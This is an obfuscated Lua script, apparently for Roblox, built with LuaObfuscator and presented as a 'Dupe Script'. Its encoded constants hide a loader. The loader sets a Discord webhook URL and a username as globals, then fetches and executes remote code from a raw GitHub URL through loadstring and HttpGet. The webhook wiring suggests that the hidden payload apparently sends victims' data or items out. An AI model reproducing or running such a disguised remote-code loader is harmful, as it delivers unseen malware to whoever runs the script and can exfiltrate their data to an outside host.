--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v87=0;local v88;while true do if (v87==1) then return v88;end if (v87==0) then v88=v5(v81,v19);v19=nil;v87=1;end end else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/(2^(v32-(2 -1))))%(2^(((v33-(2 -1)) -(v32-(1 -0))) + 1)) ;return v82-(v82%(2 -1)) ;else local v83=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v83 + v83))>=v83) and ((143 + 426) -(367 + 201))) or (927 -(214 + 113 + 600)) ;end end local function v21()local v34=877 -((1347 -(68 + 997)) + (1865 -(226 + 1044))) ;local v35;while true do if (v34==((7132 -5494) -(1523 + 114))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 -0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v37 * (57 + 199)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + ((189 -(67 + 113)) -5) ;return (v41 * (31011612 -14234396)) + (v40 * (120312 -54776)) + (v39 * (606 -(64 + 23 + 263))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1 + 0 ,(97 -(10 + 8)) -59 ) * ((954 -((3084 -2282) + 150))^32)) + v42 ;local v46=v20(v43,56 -35 ,31);local v47=((v20(v43,57 -25 )==1) and  -(1 + 0)) or (998 -(915 + 82)) ;if (v46==(0 -0)) then if (v45==0) then return v47 * (0 + 0) ;else v46=1 -0 ;v44=1187 -((1511 -(416 + 26)) + (376 -258)) ;end elseif (v46==(4643 -2596)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1015 + 8) ) * (v44 + (v45/((793 -(368 + 423))^(163 -(48 + 63))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v65=439 -(145 + 293) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==(1821 -(1483 + 338))) then v52=1695 -(1229 + 466) ;v53=nil;v51=1;end if (v51==(580 -(386 + 192))) then v56=nil;v57=nil;v51=3;end if (v51~=(1207 -(696 + 510))) then else v54=nil;v55=nil;v51=3 -1 ;end if (v51~=3) then else v58=nil;while true do local v89=0;while true do if ((1263 -(1091 + 171))==v89) then if (v52~=1) then else local v106=0;while true do if (v106==1) then v58={};v52=2;break;end if (v106==(0 + 0)) then v56={v53,v54,nil,v55};v57=v23();v106=375 -(123 + 251) ;end end end if (v52~=(0 -0)) then else local v107=698 -(208 + 490) ;local v108;while true do if (v107~=0) then else v108=0;while true do if (v108==1) then v55={};v52=1 + 0 ;break;end if ((0 + 0)==v108) then v53={};v54={};v108=837 -(660 + 176) ;end end break;end end end break;end if (v89~=0) then else if (v52==2) then local v109=0 + 0 ;while true do if (v109==0) then for v147=1,v57 do local v148=0;local v149;local v150;local v151;while true do if (v148==(203 -(14 + 188))) then v151=nil;while true do if (v149==(675 -(534 + 141))) then local v161=0;while true do if (v161~=0) then else v150=v21();v151=nil;v161=1;end if (1~=v161) then else v149=1 + 0 ;break;end end end if (v149==1) then if (v150==1) then v151=v21()~=(0 + 0) ;elseif (v150==(2 + 0)) then v151=v24();elseif (v150~=3) then else v151=v25();end v58[v147]=v151;break;end end break;end if (v148==0) then v149=0 -0 ;v150=nil;v148=1;end end end v56[3]=v21();v109=1;end if (v109~=(1 -0)) then else for v152=2 -1 ,v23() do local v153=0;local v154;local v155;local v156;while true do if (v153==(0 + 0)) then v154=0 + 0 ;v155=nil;v153=1;end if (v153==1) then v156=nil;while true do if (v154==(396 -(115 + 281))) then v155=0 -0 ;v156=nil;v154=1;end if (1==v154) then while true do if (v155~=0) then else v156=v21();if (v20(v156,1 + 0 ,1)==0) then local v163=0;local v164;local v165;local v166;local v167;local v168;while true do if (v163~=(4 -2)) then else v168=nil;while true do if (v164~=(0 -0)) then else v165=0;v166=nil;v164=868 -(550 + 317) ;end if (v164==(2 -0)) then while true do if (v165~=3) then else if (v20(v167,3,3)==(1 -0)) then v168[4]=v58[v168[11 -7 ]];end v53[v152]=v168;break;end if (1==v165) then local v171=285 -(134 + 151) ;while true do if (v171==0) then local v180=0;while true do if (v180==0) then v168={v22(),v22(),nil,nil};if (v166==(0 -0)) then local v181=0;while true do if (v181==(0 -0)) then v168[3]=v22();v168[1828 -(1195 + 629) ]=v22();break;end end elseif (v166==1) then v168[3 -0 ]=v23();elseif (v166==(243 -(187 + 54))) then v168[3]=v23() -((782 -(162 + 618))^16) ;elseif (v166~=3) then else local v186=0 + 0 ;local v187;while true do if (v186~=(0 + 0)) then else v187=0 -0 ;while true do if ((0 -0)~=v187) then else v168[3]=v23() -((1 + 1)^(1652 -(1373 + 263))) ;v168[1004 -(451 + 549) ]=v22();break;end end break;end end end v180=1 + 0 ;end if ((1 -0)==v180) then v171=1 -0 ;break;end end end if (v171==(1385 -(746 + 638))) then v165=1 + 1 ;break;end end end if (v165==2) then if (v20(v167,1,1 -0 )==1) then v168[343 -(218 + 123) ]=v58[v168[2]];end if (v20(v167,1583 -(1535 + 46) ,2 + 0 )==(1 + 0)) then v168[3]=v58[v168[563 -(306 + 254) ]];end v165=1 + 2 ;end if (v165~=(0 -0)) then else local v172=0;local v173;while true do if (v172==0) then v173=1467 -(899 + 568) ;while true do if (0~=v173) then else v166=v20(v156,2,2 + 1 );v167=v20(v156,9 -5 ,6);v173=604 -(268 + 335) ;end if (v173~=1) then else v165=291 -(60 + 230) ;break;end end break;end end end end break;end if (v164~=1) then else local v169=572 -(426 + 146) ;while true do if (v169~=1) then else v164=2;break;end if (v169~=(0 + 0)) then else v167=nil;v168=nil;v169=1;end end end end break;end if (v163==(1457 -(282 + 1174))) then v166=nil;v167=nil;v163=813 -(569 + 242) ;end if (v163==(0 -0)) then v164=0 + 0 ;v165=nil;v163=1025 -(706 + 318) ;end end end break;end end break;end end break;end end end v52=1254 -(721 + 530) ;break;end end end if (v52~=(1274 -(945 + 326))) then else local v110=0 -0 ;while true do if (v110~=(0 + 0)) then else for v157=1,v23() do v54[v157-(701 -(271 + 429)) ]=v28();end return v56;end end end v89=1;end end end break;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v84=0,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=5) then if (v80<=2) then if (v80<=0) then local v94=v79[2];local v95,v96=v70(v77[v94](v13(v77,v94 + 1 ,v79[3])));v72=(v96 + v94) -1 ;local v97=0;for v111=v94,v72 do v97=v97 + 1 ;v77[v111]=v95[v97];end elseif (v80>1) then local v114=v79[2];v77[v114]=v77[v114](v13(v77,v114 + 1 ,v72));else local v116=v79[2];local v117=v77[v79[3]];v77[v116 + 1 ]=v117;v77[v116]=v117[v79[4]];end elseif (v80<=3) then v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v71=v79[3];elseif (v80>4) then v77[v79[2]]=v61[v79[3]];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=8) then if (v80<=6) then v77[v79[2]]=v79[3];elseif (v80==7) then v77[v79[2]]();else do return;end end elseif (v80<=10) then if (v80==9) then v71=v79[3];else v77[v79[2]]=v79[3]~=0 ;end elseif (v80==11) then local v125;local v126,v127;local v128;local v129;v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v129=v79[2];v128=v77[v79[3]];v77[v129 + 1 ]=v128;v77[v129]=v128[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v71=v71 + 1 ;v79=v67[v71];v129=v79[2];v126,v127=v70(v77[v129](v13(v77,v129 + 1 ,v79[3])));v72=(v127 + v129) -1 ;v125=0;for v143=v129,v72 do local v144=0;while true do if (v144==0) then v125=v125 + 1 ;v77[v143]=v126[v125];break;end end end v71=v71 + 1 ;v79=v67[v71];v129=v79[2];v77[v129]=v77[v129](v13(v77,v129 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];else v77[v79[2]][v79[3]]=v79[4];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F47030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O313230313539342O3536353733323935342F555A396F5F52623269394D7A6F74787933344F4D6A3555505845376D70365A6F4A6E6F4B534D466649516D2O362D7543425648677A742D66705442384269427A4A422D4A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C756103083O00557365726E616D65030A3O0062656E67616C7031333503073O004875624E616D65030B3O00447570652053637269707400173O0012063O00013O0026043O000E000100020004093O000E0001001205000100033O00300B00010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026043O0001000100010004093O00010001001205000100033O0030030001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00083O00017O00",v9(),...);end
